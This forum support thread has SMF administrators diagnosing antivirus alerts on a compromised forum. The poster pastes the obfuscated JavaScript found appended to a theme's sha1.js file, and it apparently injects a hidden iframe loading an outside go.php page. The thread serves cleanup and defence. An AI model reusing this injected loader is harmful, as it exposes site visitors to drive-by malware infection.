Link Scanner Alert. Threat was blocked

briankstan · syyskuu 07, 2011, 03:25:08 IP

I'm getting some some reports from some of my forum members that there are some thread coming from my website. I've attached an image of the pop up that is being received. the web address is different when it comes up again. the .cu.cc part is consistent in them however.

another report from another member is Microsoft Security Essentials detects "Exploit:JS/Mult.DW".

I can't figure out what is going on. I'm running SMF version 1.1.14

the website is www.saltlakemini-z.com [nofollow]

any help would be greatly appreciated, thanks.

Kindred · syyskuu 07, 2011, 03:53:44 IP

1- is it only specific threads?

If so, check the signatures of the users who posted in that thread.
if not, then check your php files and directories for recent additions....

briankstan · syyskuu 07, 2011, 03:58:21 IP

it's not coming from specific threads, I didn't even get a warning using (firefox and AVG) but when I use IE, it will pop up once in a while. Usually when visiting the side and not logged in on the main page.

what would I be looking for in the .php files?

Illori · syyskuu 07, 2011, 04:01:48 IP

as a guest browsing your forum i get this

maybe that will help you figure out where the issue is.

briankstan · syyskuu 07, 2011, 04:24:24 IP

thanks, I've replaced that file with the original file from the default theme. Hopefully that was it.

My problem is that I haven't been receiving the threat notices. Don't know why I'm up to date on with AVG.

Illori · syyskuu 07, 2011, 04:26:36 IP

no warnings here now.

briankstan · syyskuu 07, 2011, 04:36:24 IP

I did a compare of the 2 files, they were quite different. especially at the end of the file. the original file had a lot of code right on the last 3 line. here it is, would that have been the issue?

Next question is how did it get in there?

Koodi [Valitse]

String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}

n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);

Illori · syyskuu 07, 2011, 04:37:12 IP

try asking your host if they can find out.

briankstan · syyskuu 07, 2011, 04:42:51 IP

thanks for your help. I hope that got it and I'll follow up with my host to see if they can help me figure out how it got in there.

I've emailed a few of the members that have had the issue to check and see if that stops the issue. I'll report back.

Omniverse · syyskuu 08, 2011, 12:09:06 IP

This is the same attack that affected my site, a js file was changed and that bit of code tacked on.
File on my site was mootools.js, which is used by tiny portal.

This thread:
http://www.simplemachines.org/community/index.php?topic=451581.0

briankstan · syyskuu 08, 2011, 12:15:27 IP

I saw your thread, I looked for that file but didn't see it. mine was also a .js file as well, but it was one of the theme files. Also the index.php file that was in the themes folder was infected.

Hopefully that was all. Everything seems to be working now without the virus warnings.

I also don't know how they got access. I talked with my IP but wasn't able to determine how it was done.

Illori · syyskuu 08, 2011, 02:57:02 IP

who is your host?

briankstan · syyskuu 08, 2011, 03:01:56 IP

hostmonster

Illori · syyskuu 08, 2011, 03:03:28 IP

you have an oversold host, i would not be surprised if you have security issues on your server, someone else got hacked and they got access to your files as well. check those files closely for any that have been modified.

Illori · syyskuu 08, 2011, 03:15:49 IP

can you attach the file if you still have it that was modified and caused the issue?

briankstan · syyskuu 08, 2011, 03:24:47 IP

attached is the .js file, I don't have the index.php file as my computer anitvirus software wouldn't let me download it form the server onto my computer. the bottom 3 lines is what was different.

I simply replaced the files with the ones that are included in the 1.1.14 full install.

The index.php file is in the folder yourdomain/forum/themes/
The sha1.js file is located in the folder yourdomain/forum/themes/default/

Illori · syyskuu 08, 2011, 04:03:27 IP

can you check your files for a "go.php" file?

Teal · syyskuu 08, 2011, 05:12:12 IP

We ran into the exact same issue as first posted. It turned out to be an "injection" in the following:

./Themes/default/sha1.js

Once it was removed, the problem went away.

Teal

Illori · syyskuu 08, 2011, 05:14:32 IP

did you check if the added script was the exact same as was posted above?

Simple Machines Community Forum

Uutiset:

Link Scanner Alert. Threat was blocked

briankstan

Kindred

briankstan

Illori

briankstan

Illori

briankstan

Illori

briankstan

Omniverse

briankstan

Illori

briankstan

Illori

Illori

briankstan

Illori

Teal

Illori